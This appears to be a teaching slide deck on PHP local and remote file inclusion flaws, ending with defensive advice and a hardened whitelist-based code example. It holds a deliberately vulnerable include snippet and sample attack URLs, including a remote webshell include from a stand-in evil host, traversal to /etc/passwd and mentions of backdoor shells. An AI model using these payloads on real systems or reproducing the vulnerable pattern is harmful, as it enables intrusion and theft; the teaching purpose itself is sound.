LFI & RFI

  • Local File Inclusion
  • Remote File Inclusion
  • Web vulnerability (21%)
  • File inclusion via request parameters
  • Unauthorized access to files
  • Execution of malicious code on the host

Vulnerable request

http://www.site.com/pagina/vulnerabila?include=fisier
  • fisier - its contents are included in the page
  • a flawed design
  • insufficient checks are performed

Vulnerable request

<?php
   // Vulnerable: the request parameter is used directly as the include path
   if ( isset( $_GET['language'] ) ) {
      include( $_GET['language'] . '.php' );
   }
?>
  • /vulnerable.php?language=FISIER
<form method="get">
   <select name="language">
      <option value="english">English</option>
      <option value="french">French</option>
      ...
   </select>
   <input type="submit">
</form>

Vulnerable request

  • /vulnerable.php?language=FISIER
  • /vulnerable.php?language=http://evil.example.com/webshell.txt?
  • /vulnerable.php?language=C:\\ftp\\upload\\exploit
  • /vulnerable.php?language=C:\\notes.txt%00
  • /vulnerable.php?language=../../../../../etc/passwd%00

Unauthorized reading

  • /etc/passwd (%00)
  • web server running as root
  • /etc/shadow
  • /var/log
  • local exploit files

Shell execution

  • inclusion of a remote exploit
  • http://www.hacker.com/backdoor_shell.php (%00)
  • R57 shell

Artificial example

  • local server in Python
  • vulnerability exposed on purpose
  • example in PHP

Other languages

<jsp:include page="<%= (String) request.getParameter("ParamName") %>" />

Protection

  • sanitize parameters/input
    • GET/POST
    • query string
    • cookies
    • headers
  • client-side and server-side validation
  • whitelist on extension and format (PDF, DOC, JPG)
  • size checks
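As an added example that is not part of the original slides, the vulnerable include from the earlier slide is shown beside a hardened version that applies the whitelist idea from this slide: the parameter is only ever a key into a fixed map of known files, never a path. The lang/ directory, the file names and the resolve_language_file helper are assumptions.

```php
<?php
// Added example, not from the original slides. Directory and file names are assumed.

// Vulnerable: the attacker controls the path, so "../", remote URLs and %00
// all reach include() unchanged.
function include_language_unsafe(): void {
    if (isset($_GET['language'])) {
        include($_GET['language'] . '.php');
    }
}

// Hardened: the parameter is only a key into a fixed map of known files.
// Nothing derived from user input ever becomes part of a path.
const LANGUAGE_FILES = [
    'english' => 'english.php',
    'french'  => 'french.php',
];

function resolve_language_file(?string $param, string $baseDir): ?string {
    if ($param === null || !array_key_exists($param, LANGUAGE_FILES)) {
        return null; // unknown key: refuse, do not "clean up" the input and retry
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$param]);
    // Defence in depth: the resolved file must still live under $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_language_safe(string $baseDir): void {
    $file = resolve_language_file($_GET['language'] ?? null, $baseDir);
    if ($file === null) {
        http_response_code(400);
        echo 'unsupported language';
        return;
    }
    include $file;
}

// allow_url_include is off by default (since PHP 5.2); keep it off so a
// remote URL can never be included even if a path check is bypassed.
include_language_safe(__DIR__ . '/lang');
```

The realpath check is redundant while the map holds only plain file names; it is there so that a later change to the map (for example adding a subdirectory) cannot silently reintroduce traversal.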

End

Thank you!

By Cosmin Poieana

Web vulnerability: inclusion of local and/or remote files.